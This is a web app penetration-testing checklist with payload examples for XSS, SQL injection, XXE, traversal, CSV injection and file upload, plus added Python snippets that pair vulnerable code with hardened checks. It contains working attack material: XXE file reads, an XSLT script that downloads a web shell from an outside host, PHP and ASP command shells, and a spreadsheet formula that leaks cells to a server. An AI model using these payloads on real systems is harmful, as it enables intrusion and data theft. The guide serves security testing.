It’s always handy to have a good checklist when it comes to web app pen-testing. It’s even better to have some examples for each case 🙂
We’ll start with more “general” cases and then dig deeper into some obscure or language dependent attacks.
Glossary
XSS (Cross-site scripting)
CSS(Cascading Style Sheet) injection
Format string attack
Directory traversal
SQL injection
SSJS (server-side JavaScript) injection
XXE (Xml eXternal Entity)
XXE C# remote code execution
Deserialization
Expression Language Injection
Insecure direct object reference (IDOR)
Open redirect
HTTP response splitting
CSRF (Cross-site request forgery)
CORS (Cross-origin resource sharing)
Check if tokens are invalidated at logout
Change HTTP Referer
Truncate file names
CSV injection
Code execution
File upload
Examples
XSS (Cross-site scripting)
<svg onload=alert(1)>
<svg/onload=alert(1)>
<img src=x123 onerror=confirm(1)>
onmousemove="prompt(1);" (for injection inside the attribute list of an existing tag)
CSS (Cascading Style Sheet) injection
Check how stylesheets are included. A relative href (no leading "/" and no scheme) is resolved against the path of the current URL, so if you can influence that path (for example by appending a trailing segment such as /page/anything/ to it) the browser may fetch and interpret attacker-controlled content as CSS (relative path overwrite).
Here is an example:
<link href="styles.css" ...
Format string attack
Use these wherever input reaches a printf-style format argument: %x and %d read values off the stack, %s dereferences them (often a crash, which is the first sign), and %n writes the number of bytes printed so far to a pointer taken from the stack.
%d%d%d...%d
%n%n%n...%n
%lf%lf%lf...%lf
%s%s%s...%s
%x%x%x...%x
Directory traversal
../../[...]/etc/passwd
../../[...]/windows/system.ini
Also try URL-encoded (%2e%2e%2f) and double-encoded (%252e%252e%252f) variants, and backslashes on Windows targets.
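As an added example (not from the original post), here is the naive path join that makes the probes above work, next to the check that stops them. The document root /var/www/files is an assumption for the demo; the function only normalises strings, so it runs without touching the file system.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumption for this example: downloads are served from this directory.
DOC_ROOT = "/var/www/files"


def resolve_vulnerable(user_path: str) -> str:
    """Naive join: '../' sequences in the request walk out of DOC_ROOT,
    and an absolute path replaces DOC_ROOT entirely."""
    return posixpath.normpath(posixpath.join(DOC_ROOT, unquote(user_path)))


def resolve_safe(user_path: str) -> Optional[str]:
    """Decode once, normalise, then require the result to stay under DOC_ROOT.

    Returns the resolved path, or None when the request must be rejected.
    """
    decoded = unquote(user_path)
    if "\x00" in decoded or "\\" in decoded:
        # null bytes truncate paths in some runtimes; backslashes are
        # separators on Windows, so neither belongs in a file name here
        return None
    candidate = posixpath.normpath(
        posixpath.join(DOC_ROOT, decoded.lstrip("/")))
    # commonpath rather than startswith: '/var/www/files-old/x' would pass a
    # plain startswith(DOC_ROOT) check
    if posixpath.commonpath([DOC_ROOT, candidate]) != DOC_ROOT:
        return None
    return candidate


def traversal_probes() -> list:
    """Probes from this checklist plus URL-encoded variants (constructed)."""
    return [
        "../../../../etc/passwd",
        "..%2F..%2F..%2Fetc%2Fpasswd",          # encoded slashes
        "%2e%2e/%2e%2e/%2e%2e/etc/passwd",       # encoded dots
        "/etc/passwd",                           # absolute path
        "reports/../../../etc/passwd",           # legitimate prefix first
    ]


def compare() -> dict:
    """Map each probe to (naive result, hardened result)."""
    return {p: (resolve_vulnerable(p), resolve_safe(p)) for p in traversal_probes()}
```

Every probe resolves to something outside the document root with the naive join and is rejected by the hardened version; the one exception is the absolute path, which the hardened version simply re-roots under DOC_ROOT.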
SQL injection
' or "1"='1
" or '1'="1
" OR SLEEP(5) -- 
' OR SLEEP(5) -- 
" OR WAITFOR DELAY '00:00:05' --
' OR WAITFOR DELAY '00:00:05' --
...
SLEEP() takes seconds (MySQL); WAITFOR DELAY is the MSSQL equivalent. In MySQL the -- comment only works with a space after it (or use #), and the double-quoted variants only work where " delimits strings rather than identifiers.
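An added example (not part of the original post) showing why the quote payloads above work: the same login query built by string concatenation and as a parameterised statement, run against an in-memory SQLite table with constructed rows. SQLite has no SLEEP(), so the time-based payloads from the list need MySQL or MSSQL; the boolean and comment payloads behave the same everywhere.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, user: str, password: str) -> list:
    """String-built query: the quotes in the payload become SQL syntax."""
    sql = (f"SELECT name FROM users "
           f"WHERE name='{user}' AND password='{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, user: str, password: str) -> list:
    """Parameterised query: the payload is compared as a literal string."""
    sql = "SELECT name FROM users WHERE name=? AND password=?"
    return [row[0] for row in conn.execute(sql, (user, password))]


def demo() -> dict:
    """Run three payloads through both versions; values are (vulnerable, safe)."""
    conn = build_db()
    results = {}
    # password field: OR binds weaker than AND, so every row matches
    results["or-true"] = (
        login_vulnerable(conn, "nobody", "' or '1'='1"),
        login_safe(conn, "nobody", "' or '1'='1"),
    )
    # username field: the comment removes the password check entirely
    results["comment"] = (
        login_vulnerable(conn, "' OR 1=1 -- ", "wrong"),
        login_safe(conn, "' OR 1=1 -- ", "wrong"),
    )
    # targeted variant: log in as a named user without the password
    results["target"] = (
        login_vulnerable(conn, "bob' -- ", "wrong"),
        login_safe(conn, "bob' -- ", "wrong"),
    )
    return results
```

The vulnerable version returns every user for the first two payloads and exactly "bob" for the third; the parameterised version returns nothing for all of them.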
SSJS injection
Applies when user input reaches eval() or new Function() inside a Node.js handler. The first payload confirms execution by writing a marker into the response; the second reads a file.
res.end('malwrforensics')
res.end(require('fs').readFileSync('/etc/passwd'))
XXE (Xml eXternal Entity)
Three variants: read a local file, run a command (expect:// needs the PHP expect extension loaded, so it rarely works), and fetch a URL from a server you control (this confirms the parser resolves external entities even when nothing is reflected, and doubles as an SSRF check).
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds><user>&xxe;</user>
<pass>mypass</pass></creds>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://malwrforensics.com/scripts/hex_to_bin.txt" >]>
<foo>&xxe;</foo>
XXE C# remote code execution
Despite the heading, this one is not a DTD entity trick but an XSLT stylesheet with embedded C# (msxsl:script). It runs when the application applies attacker-supplied XSLT with script support enabled (XslCompiledTransform loaded with XsltSettings.EnableScript). The first stylesheet drops a web shell; the second only proves that code runs.
<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://test.com/testnamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml() {
    System.Net.WebClient webClient = new System.Net.WebClient();
    webClient.DownloadFile("https://x.x.x.x/shell.aspx", @"c:\inetpub\wwwroot\shell.aspx");
    return "It works!";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
If you don't have a web server at your disposal, you can check whether it's working with a stylesheet like this:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://example.com/ns">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string Code() {
    return "malwrforensics_token";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:Code()"/>
</xsl:template>
</xsl:stylesheet>
More details here.
Deserialization
Java
This is a great resource (and cheat sheet).
.NET:
You can find here a basic C# example of a deserialization attack.
Usually the payloads will be base64 encoded.
AAEAAAD/////...
Expression Language Injection
T(java.lang.Runtime).getRuntime().exec("calc.exe")
This is SpEL syntax; depending on the framework the expression may need to be wrapped in ${...} or #{...} to be evaluated.
More details here.
Insecure direct object reference (IDOR)
If an object is referenced by an ID, check if you can access other objects that aren’t exposed (objects you aren’t supposed to have access to).
Example: https://web.site/downloadfile?id=12345
Check other objects with different IDs (..,12344, 12346,..)
Open redirect
This usually happens when one of the parameters in a form or link holds a URL the application redirects to.
Example: https://web.site/doCmd?id=1&url=http://web.site/page
You can change the url to point to another (phishing/malicious) website; the victim sees a link on the trusted domain.
Can be used to bypass some content filtering systems, especially if used in conjunction with a URL shortening service.
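An added example (not from the original post) of the redirect check that closes the hole above, together with the values a tester throws at a url= parameter. The site host web.site is an assumption for the example; the probes are constructed. The validator only accepts same-host http(s) URLs or absolute paths on the site, and covers the usual bypasses: scheme-relative //host, credentials in the authority (web.site@evil), host-prefix matches, backslashes and javascript: URLs.

```python
from urllib.parse import urlparse

# Assumption for this example: the application's own host name.
SITE_HOST = "web.site"


def is_safe_redirect(url: str) -> bool:
    """Accept only same-site absolute URLs or plain site-relative paths."""
    url = url.strip()
    if any(ch in url for ch in "\r\n\x00\\"):
        # CR/LF would split the Location header; browsers treat '\' as '/'
        return False
    parsed = urlparse(url)
    if parsed.scheme:
        # absolute URL: only http(s) and only our own host. urlparse takes
        # the host after any user@, so "web.site@evil.com" gives hostname
        # "evil.com" and is rejected here
        return parsed.scheme in ("http", "https") and parsed.hostname == SITE_HOST
    if url.startswith("//"):
        # scheme-relative: the browser supplies the scheme and follows the host
        return False
    # no scheme, no authority: must be an absolute path on this site
    return not parsed.netloc and url.startswith("/")


def open_redirect_probes() -> list:
    """Values to try in a url= style parameter (constructed for this example)."""
    return [
        "http://malwrforensics.com",
        "//malwrforensics.com/",
        "https://web.site@malwrforensics.com/",
        "https://web.site.malwrforensics.com/",
        "/\\malwrforensics.com",
        "javascript:alert(1)",
    ]
```

Every probe in the list is rejected, while /account and https://web.site/page pass. Rejecting instead of "fixing" the URL is deliberate: a sanitiser that rewrites the value is another parser to get wrong.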
HTTP response splitting
Inject CR/LF (\r\n, URL-encoded %0d%0a) into a value that is copied into a response header, for example a cookie value or a redirect Location. If the server doesn't strip or encode them you can add headers of your own, or end the header block early and supply the body yourself.
More details here.
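An added example (not from the original post) of a handler that copies a cookie value into a Set-Cookie header unchecked, a client-side parse of what comes back, and the hardened version. The response layout and the lang= cookie are constructed for the demo; the payload is the CR/LF injection described above.

```python
from urllib.parse import quote


def response_vulnerable(lang: str) -> bytes:
    """Cookie value copied into the header block unchecked."""
    return ("HTTP/1.1 200 OK\r\n"
            f"Set-Cookie: lang={lang}\r\n"
            "Content-Type: text/html\r\n"
            "\r\n"
            "<p>ok</p>").encode()


def response_safe(lang: str) -> bytes:
    """Reject control characters, then percent-encode the rest."""
    if any(ch in lang for ch in "\r\n\x00"):
        raise ValueError("control characters in header value")
    # percent-encoding is the usual alternative to rejecting outright
    return response_vulnerable(quote(lang, safe=""))


def safe_rejects(value: str) -> bool:
    """True when response_safe() refuses the value."""
    try:
        response_safe(value)
    except ValueError:
        return True
    return False


def parse_response(raw: bytes):
    """Split a raw response the way a client does: the first blank line
    ends the headers, everything after it is the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *lines = head.split(b"\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


# Constructed payload for the lang= cookie: closes the real header block
# early and supplies its own headers and body ("<script>alert(1)</script>"
# is 25 bytes, hence the Content-Length).
PAYLOAD = ("en\r\n"
           "Set-Cookie: session=attacker\r\n"
           "Content-Length: 25\r\n"
           "\r\n"
           "<script>alert(1)</script>")


def demo():
    """Headers and body a client sees for the vulnerable handler."""
    _, headers, body = parse_response(response_vulnerable(PAYLOAD))
    return headers, body
```

With the vulnerable handler the client sees two Set-Cookie headers, an attacker-chosen Content-Length and a body that starts with the injected script; the server's own Content-Type and "<p>ok</p>" become trailing garbage. The hardened handler refuses the value outright.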
CSRF (Cross-site request forgery)
Check for the presence of tokens with random values in forms. Especially forms that will change a password, edit an address/order/.., etc.
CORS (Cross-origin resource sharing)
Send the request with an "Origin" header set to a website you control. If that origin is reflected together with Access-Control-Allow-Credentials: true, a page on your site can read the victim's authenticated responses, which is useful for stealing CSRF tokens.
curl -i -H "Origin: http://malwrforensics.com" http://<target>
Check if you receive
"Access-Control-Allow-Origin: http://malwrforensics.com" (and "Access-Control-Allow-Credentials: true") or
"Access-Control-Allow-Origin: *"
Note that browsers never send cookies to a "*" response, so the wildcard only exposes data that was already public; the reflected origin with credentials is the real finding. Also try origins that contain the target's name (http://web.site.malwrforensics.com, http://evilweb.site) to catch prefix/suffix whitelist checks, and the literal value null.
More details here and a great explanation here.
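An added example (not from the original post): the set of Origin values worth sending, and the logic to interpret the headers that come back. Origins and the target https://web.site are constructed for the example; wire the classifier up to whatever HTTP client you use to send the curl request above.

```python
def cors_probe_origins(target_origin: str,
                       attacker_origin: str = "http://malwrforensics.com") -> list:
    """Origin header values to send; each one checks a different whitelist mistake.

    target_origin is the site under test, e.g. "https://web.site" (assumed here),
    attacker_origin is a domain you control.
    """
    target_host = target_origin.split("://", 1)[1]
    attacker_host = attacker_origin.split("://", 1)[1]
    return [
        attacker_origin,                             # any origin reflected?
        f"https://{target_host}.{attacker_host}",    # prefix (startswith) check
        f"https://evil{target_host}",                # suffix (endswith) check
        f"https://anything.{target_host}",           # wildcard sub-domains
        "null",                                      # sandboxed iframe / data: URL
    ]


def classify_cors(sent_origin: str, response_headers: dict) -> str:
    """Interpret the CORS headers that came back for the Origin we sent."""
    h = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no CORS header"
    if acao == "*":
        # browsers never send cookies to a '*' response, so only public data leaks
        return "wildcard, no credentials"
    if acao == sent_origin and creds:
        return "origin reflected with credentials"
    if acao == sent_origin:
        return "origin reflected, no credentials"
    if acao == "null" and creds:
        return "null origin trusted with credentials"
    return "fixed whitelist"


def cors_exploitable(sent_origin: str, response_headers: dict) -> bool:
    """True when a page on sent_origin could read the victim's authenticated responses."""
    return classify_cors(sent_origin, response_headers).endswith("with credentials")
```

A reflected origin without credentials still matters if the endpoint returns something sensitive without a cookie (an API key in a JS config, for instance), but it is not the CSRF-token-stealing case.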
Check if tokens are invalidated at logout
Check whether session cookies and tokens are still accepted after you log off. Capture them with a proxy before logging out, then replay each one against an authenticated endpoint and see whether it still works.
Change HTTP Referer
Use a proxy (Burp/ZAP/etc) to intercept and change the Referer field. Look for errors.
Truncate file names
Add %00 (a null byte) or %0D%0A to file names in GET/POST requests. Runtimes that hand the name to C code stop reading it at the null byte, so a name like shell.php%00.jpg may pass an extension check and still be stored as shell.php.
CSV injection
Add something like one of the following to fields that end up in the exported CSV file (the first is a DDE payload for Excel, IMPORTXML works in Google Sheets):
"=1+1+cmd|' /C calc'!A0"
"=IMPORTXML("http://web.server?p=", "//a")"
"=IMPORTXML("http://web.server?p=", "//a/@href")"
=HYPERLINK("http://web.server?leak="&A1&A2, "Error: please click here")
The last one shows an error message in the cell; when the user clicks on it, the contents of cells A1 and A2 are sent to the web server.
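An added example (not from the original post) of the export-side fix: every cell is quoted, and any cell a spreadsheet would read as a formula gets a leading apostrophe so it stays text. The sample rows are constructed and reuse the payloads above; the numeric exception (so that "-5" is not mangled) is a design choice for this example.

```python
import csv
import io

# Characters that make a spreadsheet treat a cell as a formula (tab and CR
# can start a new cell, so they count too)
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(cell: str) -> bool:
    """True when a spreadsheet would interpret the cell as a formula."""
    if not cell:
        return False
    try:
        float(cell)          # plain numbers such as -5 or +3.5 are harmless
        return False
    except ValueError:
        pass
    return cell[:1] in FORMULA_PREFIXES


def neutralize(cell: str) -> str:
    """Prefix a formula-looking cell with a single quote so it stays text."""
    return "'" + cell if looks_like_formula(cell) else cell


def export_csv(rows) -> str:
    """Write rows with every cell quoted and formula-looking cells neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize(str(cell)) for cell in row])
    return buf.getvalue()


# Constructed sample: a user-supplied "note" field carrying the payloads above
SAMPLE_ROWS = [
    ("name", "note"),
    ("alice", "=1+1+cmd|' /C calc'!A0"),
    ("bob", '=HYPERLINK("http://web.server?leak="&A1&A2, "Error: please click here")'),
    ("carol", "-5"),
    ("dave", "@SUM(1,2)"),
]
```

The csv module doubles embedded double quotes and wraps each field, so the HYPERLINK payload survives as an inert string; the apostrophe is what Excel and LibreOffice use to force text, and it is not displayed.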
Code execution
; cat /etc/passwd
& dir c:
Also try the other separators (|, &&, ||) and, on Unix, $(...) and backticks, since a filter often only blocks ";".
File upload
If the page you’re testing allows users to upload files, you may want to test some of the following:
- html page with javascript
<html><body><script>alert('test');</script></body></html>
- html page with ASP.NET
<% label1.Text = "test"; %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>Test Page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<asp:Label runat="server" id="label1"></asp:Label>
</div>
</form>
</body>
</html>
or, in classic ASP (VBScript) syntax:
<% Eval(Request.QueryString("cmd")) %>
- office files with macros
Create a new Office document, open the VBA editor and add the following to an auto-run handler such as Document_Open():
MsgBox "test"
or
Shell "calc.exe", vbNormalFocus
- xml file
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/system.ini" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://malwrforensics.com/en/" >]><foo>&xxe;</foo>
- images with appended PHP code (a valid image header followed by one of these)
<?php echo("test"); ?>
or
<?php passthru(base64_decode($_GET['cmd'])); ?>
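An added example (not from the original post) of the server-side screening that catches the upload tests above: extension allow-list, double extensions, null bytes in the name, a magic-bytes check against the claimed type, and a scan of the body for PHP open tags and DTD declarations. The accepted types (JPEG/PNG/GIF) and the sample uploads are constructed for the example; a real endpoint would also re-encode images and store them outside the web root.

```python
import re

# Byte signatures of the image types this endpoint claims to accept
# (assumption for the example: only JPEG, PNG and GIF are wanted).
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
ALLOWED_EXT = {".jpg": "image/jpeg", ".jpeg": "image/jpeg",
               ".png": "image/png", ".gif": "image/gif"}
# extensions a web server might execute if they appear anywhere in the name
EXEC_EXT = {"php", "phtml", "php5", "asp", "aspx", "jsp", "html", "htm", "svg"}

PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
DOCTYPE_OR_ENTITY = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def screen_upload(filename: str, data: bytes) -> list:
    """Return the reasons to reject an upload; an empty list means accept."""
    problems = []
    name = filename.lower()
    if "\x00" in name or "%00" in name:
        problems.append("null byte in file name")
    parts = name.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if any(p in EXEC_EXT for p in parts[1:-1]):
        problems.append("executable extension inside file name")   # shell.php.jpg
    if ext not in ALLOWED_EXT:
        problems.append(f"extension {ext!r} not allowed")
    detected = next((t for sig, t in MAGIC.items() if data.startswith(sig)), None)
    if detected is None:
        problems.append("no recognised image signature")
    elif ext in ALLOWED_EXT and detected != ALLOWED_EXT[ext]:
        problems.append("extension does not match content")
    if PHP_TAG.search(data):
        problems.append("PHP tag in body")                           # image + appended PHP
    if DOCTYPE_OR_ENTITY.search(data):
        problems.append("DOCTYPE/ENTITY declaration in body")        # XXE payload
    return problems


# Constructed sample uploads (not real files)
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 16
            + b"<?php passthru(base64_decode($_GET['cmd'])); ?>")
XXE_XML = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM '
           b'"file:///etc/passwd">]><foo>&xxe;</foo>')
```

The body scan is a tripwire rather than a guarantee (PHP tags can be split across chunks, and an interpreter may accept short tags), which is why the magic-bytes check and storing uploads where nothing executes them matter more than the regexes.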